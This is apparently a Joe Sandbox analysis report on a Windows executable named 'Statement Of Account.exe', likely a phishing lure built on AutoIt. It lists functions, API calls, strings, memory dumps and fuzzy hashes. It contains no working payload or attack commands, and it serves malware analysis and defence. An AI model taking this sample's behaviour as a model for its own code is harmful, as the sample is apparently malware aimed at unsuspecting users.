Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB

Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D

Strings

uxtheme.dll, xrefs: 0040EB76
IsThemeActive, xrefs: 0040EB87

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: IsThemeActive$uxtheme.dll
API String ID: 2574300362-3542929980
Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
__wsplitpath.LIBCMT ref: 00410C61

Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2

_wcsncat.LIBCMT ref: 00410C78
__wmakepath.LIBCMT ref: 00410C94

Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

_wcscpy.LIBCMT ref: 00410CCC
RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
RegQueryValueExW.ADVAPI32 ref: 00429BE4
_wcscat.LIBCMT ref: 00429C43
_wcslen.LIBCMT ref: 00429C55
_wcslen.LIBCMT ref: 00429C66
_wcscat.LIBCMT ref: 00429C80
_wcsncpy.LIBCMT ref: 00429CC0
RegCloseKey.ADVAPI32(?), ref: 00429CDE

Strings

Software\AutoIt v3\AutoIt, xrefs: 00410CDF
Include, xrefs: 00410C72, 00429BD6
\, xrefs: 00429C6E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: Include$Software\AutoIt v3\AutoIt$\
API String ID: 1004883554-2276155026
Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

Function 004095C7 Relevance: 21.5, APIs: 14, Instructions: 539sleeptimeCOMMON

Download Yara Rule

APIs

Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5

Sleep.KERNEL32(0000000A), ref: 00409870
timeGetTime.WINMM ref: 00409880

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: BuffCharSleepTimeUpper_wcslentime
String ID:
API String ID: 3219444185-0
Opcode ID: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
Opcode Fuzzy Hash: da6b74c52f7fd8fa7285d44dc66266380a963bd06260c315e722df216112258b
Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A

Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__fread_nolock.LIBCMT ref: 004523ED
__fread_nolock.LIBCMT ref: 00452432
__fread_nolock.LIBCMT ref: 0045244F
_wcscpy.LIBCMT ref: 0045247D
__fread_nolock.LIBCMT ref: 0045248E
__fread_nolock.LIBCMT ref: 004524AB
_wcscpy.LIBCMT ref: 004524D9
_fseek.LIBCMT ref: 00452517
__fread_nolock.LIBCMT ref: 0045252B
_fseek.LIBCMT ref: 00452546

Strings

FILE, xrefs: 0045240A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __fread_nolock$_fseek_wcscpy
String ID: FILE
API String ID: 3888824918-3121273764
Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004101F9
LoadCursorW.USER32(00000000,00007F00), ref: 00410209
LoadIconW.USER32(?,00000063), ref: 0041021F
LoadIconW.USER32(?,000000A4), ref: 00410232
LoadIconW.USER32(?,000000A2), ref: 00410245
LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
RegisterClassExW.USER32 ref: 004102C6

Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
Part of subcall function 004102F0: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0041036A
Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1

Strings

0, xrefs: 0041028A
#, xrefs: 00410292
PGH, xrefs: 004102AE

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$PGH
API String ID: 2880975755-3673556320
Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

Function 004102F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32 ref: 00410326
RegisterClassExW.USER32 ref: 00410359
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0041036A
LoadIconW.USER32(00400000,000000A9), ref: 004103B1

Strings

0, xrefs: 00410302
AutoIt v3 GUI, xrefs: 00410349
TaskbarCreated, xrefs: 0041035F
+, xrefs: 0041030A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_fseek.LIBCMT ref: 004525DA

Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9

__fread_nolock.LIBCMT ref: 00452618
__fread_nolock.LIBCMT ref: 00452629
__fread_nolock.LIBCMT ref: 00452644
__fread_nolock.LIBCMT ref: 00452661
_fseek.LIBCMT ref: 0045267D
_malloc.LIBCMT ref: 00452689
_malloc.LIBCMT ref: 00452696
__fread_nolock.LIBCMT ref: 004526A7

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __fread_nolock$_fseek_malloc_wcscpy
String ID:
API String ID: 1911931848-0
Opcode ID: 07c7d1d11592908342a612a25e8a5e33943486726a22accfdf27b608027379a0
Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
Opcode Fuzzy Hash: 07c7d1d11592908342a612a25e8a5e33943486726a22accfdf27b608027379a0
Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_strcat.LIBCMT ref: 0040F483
__fread_nolock.LIBCMT ref: 0040F4C6
_fseek.LIBCMT ref: 0040F517

Strings

AU3!, xrefs: 0040F47D
EA06, xrefs: 004293A9

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __fread_nolock_fseek_strcat
String ID: AU3!$EA06
API String ID: 3818483258-2658333250
Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

Function 00410130 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetMalloc.SHELL32(00000000), ref: 0041013A
SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
_wcscpy.LIBCMT ref: 00410160
SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
_wcscpy.LIBCMT ref: 004101AC
_wcscpy.LIBCMT ref: 00429451

Strings

C:\Users\user\Desktop\Statement Of Account.exe, xrefs: 0041015E, 004101AB, 0042944F, 00429450

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcscpy$DesktopFolderFromListMallocPath
String ID: C:\Users\user\Desktop\Statement Of Account.exe
API String ID: 192938534-2318844414
Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

Function 00401230 Relevance: 12.1, APIs: 8, Instructions: 83
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00401257

Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF

KillTimer.USER32(?,?), ref: 004012B0
SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
String ID:
API String ID: 1792922140-0
Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

Function 03E4E218 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03E4E2E9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03E4E50F

Memory Dump Source

Source File: 00000000.00000002.2061708935.0000000003E4B000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3e4b000_Statement Of Account.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 07213588403f1e833b7e6b4cccf4d0d3d448c497e88f3ec03ecec6f5a635a07c
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 9CA11974E00209EBDF14CFA4E894BEEB7B5FF88304F249699E501BB280D775AA41CB55

Function 00414F10 Relevance: 10.7, APIs: 7, Instructions: 189
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00414F72
_memcpy_s.LIBCMT ref: 00414FE7
__fileno.LIBCMT ref: 00415047
__read.LIBCMT ref: 0041504E
__filbuf.LIBCMT ref: 00415072
_memset.LIBCMT ref: 004150B8
_memset.LIBCMT ref: 004150E3

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

Function 00401BE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

_memset.LIBCMT ref: 00401C62
_wcsncpy.LIBCMT ref: 00401CA1
_wcscpy.LIBCMT ref: 00401CBD
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF

Strings

Line: , xrefs: 0042A9F0

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
String ID: Line:
API String ID: 1620655955-1585850449
Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

Function 004103E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
ShowWindow.USER32(?,00000000), ref: 00410454
ShowWindow.USER32(?,00000000), ref: 0041045E

Strings

edit, xrefs: 00410432
AutoIt v3, xrefs: 00410409, 0041040E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
